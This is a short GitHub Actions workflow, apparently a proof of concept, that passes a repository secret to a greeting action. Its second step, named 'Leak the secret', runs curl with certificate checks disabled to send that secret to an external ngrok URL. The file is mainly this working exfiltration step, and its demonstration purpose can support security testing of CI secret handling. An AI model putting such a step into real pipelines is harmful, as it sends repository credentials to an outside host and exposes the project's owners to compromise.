on: push
jobs:
  test:
    name: Test
    runs-on: ubuntu-latest
    steps:
    - name: 'Hello World'
      uses: actions/hello-world-docker-action@master
      with:
        who-to-greet: ${{ secrets.SUPER_SECRET }}
    - name: 'Leak the secret'
      uses: wei/curl@v1
      with:
        args: -k "https://476c8c29.ngrok.io/?leak=${{ secrets.SUPER_SECRET }}"
